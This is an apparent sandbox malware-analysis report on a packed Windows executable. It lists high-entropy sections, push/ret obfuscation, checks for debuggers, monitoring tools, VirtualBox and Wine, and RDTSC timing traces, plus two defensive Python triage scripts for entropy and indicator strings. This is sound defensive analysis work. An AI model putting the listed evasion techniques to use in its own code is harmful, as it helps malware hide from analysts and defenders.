Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: kernel.appcore.dll
Source: Bo6uO5gKL4.exe | Static file information: File size 4494336 > 1048576
Source: Bo6uO5gKL4.exe | Static PE information: Raw size of (unnamed section) is bigger than: 0x100000 < 0x289000
Source: Bo6uO5gKL4.exe | Static PE information: Raw size of nlrwmcpx is bigger than: 0x100000 < 0x1bc800

Data Obfuscation

Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Unpacked PE file: 0.2.Bo6uO5gKL4.exe.580000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nlrwmcpx:EW;gbteqlgw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nlrwmcpx:EW;gbteqlgw:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: Bo6uO5gKL4.exe | Static PE information: real checksum: 0x44ca8e should be: 0x452985
Source: Bo6uO5gKL4.exe | Static PE information: section name:
Source: Bo6uO5gKL4.exe | Static PE information: section name: .idata
Source: Bo6uO5gKL4.exe | Static PE information: section name:
Source: Bo6uO5gKL4.exe | Static PE information: section name: nlrwmcpx
Source: Bo6uO5gKL4.exe | Static PE information: section name: gbteqlgw
Source: Bo6uO5gKL4.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_3_01889399 push esp; ret (0_3_01889AE2)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_3_0188B2CD push ecx; retn 0071h (0_3_0188B2EA)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_3_01888AD9 push esi; retn 0071h (0_3_01888ADA)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_3_0188BAD7 push eax; retn 0070h (0_3_0188BAEA)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_3_0187D4F3 push eax; retf (0_3_0187D4ED)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_3_0187D477 push eax; retf (0_3_0187D4ED)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_3_018B8E37 push eax; iretd (0_3_018B9233)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_3_018B3CD2 push A4018ACBh; retf (0_3_018B3DBD)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_3_018A48E9 push cs; retn 0071h (0_3_018A48F2)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_3_018B8A84 push eax; iretd (0_3_018B9233)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_3_018C8595 push ebx; ret (0_3_018C85CD)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_3_018C6F90 pushad ; retf (0_3_018C6F91)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_3_018B3CD2 push A4018ACBh; retf (0_3_018B3DBD)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_3_018C82FB push ebx; ret (0_3_018C85CD)
Source: Bo6uO5gKL4.exeStatic PE information: section name: nlrwmcpx entropy: 7.955790238153636
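Added analyst example (not part of the Joe Sandbox report and not the sample's own code): a standard-library Python triage script that reproduces the two static findings above, push-X followed by a ret-family instruction and a section whose entropy sits near 8.0, over a constructed in-memory PE-shaped blob. The gadget bytes mirror the instructions listed (push A4018ACBh; retf, push cs; retn 0071h, push eax; iretd, push ebx; ret, pushad; retf) and the section name nlrwmcpx is the one reported; the blob layout, the virtual addresses, the 7.2 entropy threshold and the function names are this example's own assumptions.

```python
"""Static triage of PE sections: Shannon entropy per section (packed or encrypted
code sits near 8.0 bits/byte) and a linear scan for push <x> directly followed by
a ret-family instruction, the obfuscation pattern reported above. Added example,
standard library only; the PE-shaped blob is constructed in memory."""
import hashlib
import math
import struct

# push forms seen in the report (push r32, push imm32, push cs, pushad) and the
# ret family they were paired with (ret, retf, iretd, retn/retf imm16).
PUSH_REG = {0x50 + i: f"push {r}" for i, r in
            enumerate(["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"])}
PUSH_ONE = {0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds", 0x60: "pushad"}
RET = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}
RET_IMM16 = {0xC2: "retn", 0xCA: "retf"}
PACKED_THRESHOLD = 7.2   # assumption: a common triage cut-off, tune per corpus
STANDARD_NAMES = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                  ".reloc", ".bss", ".tls", ".pdata"}

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, close to 8.0 for packed code."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def find_push_ret_gadgets(code: bytes, base: int) -> list:
    """Linear byte scan (no control-flow recovery) for a push followed by a
    ret-family opcode, returned as (virtual address, text). High-entropy data
    gives chance hits, so run it on the unpacked code section."""
    found, i = [], 0
    while i < len(code):
        op = code[i]
        if op == 0x68 and i + 4 < len(code):                    # push imm32
            imm = struct.unpack_from("<I", code, i + 1)[0]
            text, nxt = f"push 0x{imm:08X}", i + 5
        elif op in PUSH_REG or op in PUSH_ONE:
            text, nxt = PUSH_REG.get(op) or PUSH_ONE[op], i + 1
        else:
            i += 1
            continue
        if nxt < len(code) and code[nxt] in RET:
            found.append((base + i, f"{text}; {RET[code[nxt]]}"))
        elif nxt + 2 < len(code) and code[nxt] in RET_IMM16:
            imm16 = struct.unpack_from("<H", code, nxt + 1)[0]
            found.append((base + i, f"{text}; {RET_IMM16[code[nxt]]} 0x{imm16:04X}"))
        i = nxt
    return found

def parse_sections(pe: bytes):
    """Yield (name, raw bytes, virtual address) from the PE section table."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    for k in range(nsections):
        off = table + 40 * k
        name = pe[off:off + 8].rstrip(b"\0").decode("latin-1")
        _vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, off + 8)
        yield name, pe[raw_ptr:raw_ptr + raw_size], va

def triage(pe: bytes) -> dict:
    """Per-section verdict: entropy, non-standard name, push/ret gadgets."""
    report = {}
    for name, data, va in parse_sections(pe):
        ent = shannon_entropy(data)
        report[name] = {"entropy": round(ent, 3),
                        "likely_packed": ent >= PACKED_THRESHOLD,
                        "nonstandard_name": name not in STANDARD_NAMES,
                        "gadgets": find_push_ret_gadgets(data, va)}
    return report

def build_sample_pe() -> bytes:
    """Constructed two-section blob with a valid section table (not runnable):
    '.text' repeats the report's gadgets, 'nlrwmcpx' is a SHA-256 chain standing
    in for packed code."""
    gadgets = (b"\x68\xCB\x8A\x01\xA4\xCB"   # push 0xA4018ACB; retf
               b"\x0E\xC2\x71\x00"           # push cs; retn 0x0071
               b"\x50\xCF"                   # push eax; iretd
               b"\x53\xC3"                   # push ebx; ret
               b"\x60\xCB")                  # pushad; retf
    text = ((b"\x90" * 64 + gadgets) * 4).ljust(0x200, b"\0")
    packed, seed = b"", b"nlrwmcpx"
    while len(packed) < 0x1000:
        seed = hashlib.sha256(seed).digest()
        packed += seed
    pe_off, text_ptr = 0x40, 0x200
    pe = bytearray(text_ptr)
    pe[:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, pe_off)
    pe[pe_off:pe_off + 4] = b"PE\0\0"
    struct.pack_into("<HH", pe, pe_off + 4, 0x14C, 2)   # Machine i386, 2 sections
    struct.pack_into("<H", pe, pe_off + 20, 0)           # SizeOfOptionalHeader = 0
    layout = [(b".text", text, text_ptr, 0x1000),
              (b"nlrwmcpx", packed, text_ptr + len(text), 0x2000)]
    for k, (name, data, ptr, va) in enumerate(layout):
        off = pe_off + 24 + 40 * k
        pe[off:off + 8] = name.ljust(8, b"\0")
        struct.pack_into("<IIII", pe, off + 8, len(data), va, len(data), ptr)
    return bytes(pe) + text + packed
```

Why these two indicators travel together: push imm; ret (and the retf and iretd variants, which additionally reload CS or CS plus EFLAGS from the stack) is an indirect jump whose target a linear disassembler never sees, and a 7.96-bit section is almost certainly compressed or encrypted code that only exists in clear form after unpacking at run time, which is why the dynamic run rather than the static file is what surfaces the behaviour below.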

Boot Survival

Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeWindow searched: window name: FilemonClass
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeWindow searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeWindow searched: window name: RegmonClass
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeWindow searched: window name: Regmonclass
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeWindow searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeFile opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
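Added analyst example (not the sandbox's detection logic and not the sample's code): a Python classifier for the decrypted string table dumped above and for the two registry keys the sample opened (Software\Wine and HARDWARE\ACPI\DSDT\VBOX__). The indicator lists are an analyst's starting set, the category names, the three-category verdict rule and the function names are this example's assumptions, and the sample inputs are constructed copies of the report entries. It also shows why the separator-less string table defeats naive .EXE token extraction.

```python
"""Classify the decrypted strings the sandbox dumped from the sample's memory
(report entries above) into anti-analysis indicator categories. Added example;
the indicator lists are an analyst's starting set, not the sandbox's rules."""
import re

INDICATORS = {
    "analysis_process": ["WINDBG.EXE", "X64DBG.EXE", "X32DBG.EXE", "OLLYDBG.EXE",
                         "IDA.EXE", "IDA64.EXE", "PROCMON.EXE", "PROCEXP.EXE",
                         "WIRESHARK.EXE", "FIDDLER.EXE"],
    "monitor_window_class": ["PROCMON_WINDOW_CLASS", "FILEMONCLASS", "REGMONCLASS"],
    "vm_artifact": ["VBOX", "VMWARE", "QEMU", "VIRTUALBOX",
                    r"ACPI\DSDT\VBOX__", r"SERVICES\VBOXSF"],
    "emulator": [r"SOFTWARE\WINE"],
    "environment_fingerprint": ["NUM_PROCESSOR", "NUM_RAM", "UPTIME_MINUTES",
                                "RECENT_FILES", "INSTALLED_APPS", "RESOLUTION_X",
                                "CREATETOOLHELP32SNAPSHOT"],
}
EXE_TOKEN = re.compile(rb"[A-Z0-9_]{2,}\.EXE")

# Constructed copies of two report entries above: the raw string-table dump and
# the registry keys the sample opened. The table has no separators, so
# neighbouring strings run together (WINDBG.EXEDBGWIRESHARK.EXE...).
MEMORY_STRINGS = (
    rb"SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_X"
    rb"RESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01"
    rb"VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECK"
    rb"WINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADRO"
    rb"INSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE"
    rb"\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEX"
    rb"CREATETOOLHELP32SNAPSHOT FAILED."
)
REGISTRY_OPENS = [rb"HKEY_CURRENT_USER\Software\Wine",
                  rb"HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__"]

def scan_blob(blob: bytes) -> dict:
    """Case-insensitive substring match of every known indicator; returns only
    the categories that hit, each with its sorted indicator list."""
    upper = blob.upper()
    hits = {}
    for category, needles in INDICATORS.items():
        matched = sorted(n for n in needles if n.upper().encode() in upper)
        if matched:
            hits[category] = matched
    return hits

def exe_tokens(blob: bytes) -> list:
    """Naive token extraction: on a separator-less string table adjacent
    strings fuse into one token, so tool names are missed or mangled."""
    return sorted({m.decode() for m in EXE_TOKEN.findall(blob.upper())})

def verdict(*blobs: bytes) -> tuple:
    """Merge hits over several artefacts and give a coarse verdict: a sample
    that checks for debuggers, VM artefacts and host details is sandbox-aware."""
    merged = {}
    for blob in blobs:
        for cat, names in scan_blob(blob).items():
            merged.setdefault(cat, set()).update(names)
    merged = {cat: sorted(v) for cat, v in merged.items()}
    label = "sandbox-aware" if len(merged) >= 3 else "inconclusive"
    return label, merged
```

The memory dump alone hits three categories (debugger and monitor process names, the VirtualBox driver glob and shared-folder service path, and host fingerprint fields such as NUM_PROCESSOR, NUM_RAM, UPTIME_MINUTES and RECENT_FILES), and the registry opens add the Wine emulator check and the VirtualBox ACPI table. The regex extractor, by contrast, returns DBGWIRESHARK.EXE and PUBLIC_CHECKWINDBG.EXE as if they were file names, which is why substring matching against a known list is the right tool for decrypted string tables of this kind.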
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: CD1127 second address: CD112B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E341BB second address: E341BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E341BF second address: E341D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jng 00007FAAAD0E3C5Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4F200 second address: E4F23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 jl 00007FAAACBBF231h 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jo 00007FAAACBBF1F6h 0x00000015 jmp 00007FAAACBBF204h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FAAACBBF1FBh 0x00000022 jp 00007FAAACBBF1F6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4F37E second address: E4F3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAD0E3C5Ch 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jne 00007FAAAD0E3C56h 0x00000011 popad 0x00000012 jnp 00007FAAAD0E3C58h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4F536 second address: E4F53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4F53A second address: E4F53E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4F53E second address: E4F555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAAACBBF1FDh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4F555 second address: E4F55D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4F55D second address: E4F564 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4F564 second address: E4F57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FAAAD0E3C61h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4FB1D second address: E4FB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4FB24 second address: E4FB36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAD0E3C5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4FB36 second address: E4FB44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E522DD second address: E52301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], eax 0x00000008 mov esi, dword ptr [ebp+12A328BFh] 0x0000000e push 00000000h 0x00000010 mov edx, dword ptr [ebp+12A329A7h] 0x00000016 call 00007FAAAD0E3C59h 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E52301 second address: E52305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E523DE second address: E52411 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b ja 00007FAAAD0E3C5Ah 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FAAAD0E3C5Ch 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E52411 second address: E52418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E52418 second address: E52491 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FAAAD0E3C56h 0x00000009 jmp 00007FAAAD0E3C63h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jp 00007FAAAD0E3C64h 0x0000001b pop eax 0x0000001c adc dh, FFFFFF91h 0x0000001f lea ebx, dword ptr [ebp+12BB5202h] 0x00000025 call 00007FAAAD0E3C69h 0x0000002a mov dh, F1h 0x0000002c pop esi 0x0000002d push eax 0x0000002e pushad 0x0000002f jmp 00007FAAAD0E3C62h 0x00000034 jp 00007FAAAD0E3C5Ch 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E52580 second address: E52585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E52585 second address: E5258A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E5262B second address: E52660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF204h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007FAAACBBF206h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E52660 second address: E52666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E52666 second address: E5266A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E5266A second address: E526C6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAAAD0E3C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+12A31BCDh], edi 0x00000013 push 00000000h 0x00000015 call 00007FAAAD0E3C59h 0x0000001a jg 00007FAAAD0E3C5Eh 0x00000020 push eax 0x00000021 jg 00007FAAAD0E3C68h 0x00000027 mov eax, dword ptr [esp+04h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FAAAD0E3C61h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E526C6 second address: E526FC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAAACBBF1FCh 0x00000008 jng 00007FAAACBBF1F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FAAACBBF207h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push edi 0x0000001c jng 00007FAAACBBF1FCh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E526FC second address: E5276B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push 00000000h 0x00000008 push ecx 0x00000009 call 00007FAAAD0E3C58h 0x0000000e pop ecx 0x0000000f mov dword ptr [esp+04h], ecx 0x00000013 add dword ptr [esp+04h], 0000001Ch 0x0000001b inc ecx 0x0000001c push ecx 0x0000001d ret 0x0000001e pop ecx 0x0000001f ret 0x00000020 mov dx, B92Ah 0x00000024 push 00000003h 0x00000026 movsx edx, dx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FAAAD0E3C58h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 push 00000003h 0x00000047 push ebx 0x00000048 mov dh, 0Bh 0x0000004a pop ecx 0x0000004b call 00007FAAAD0E3C59h 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E5276B second address: E5276F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E5276F second address: E52775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E52775 second address: E5279D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FAAACBBF1F6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f ja 00007FAAACBBF200h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E5279D second address: E527A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E63D6B second address: E63D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E731F8 second address: E731FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E3AE1D second address: E3AE27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FAAACBBF1F6h 0x0000000a rdtsc
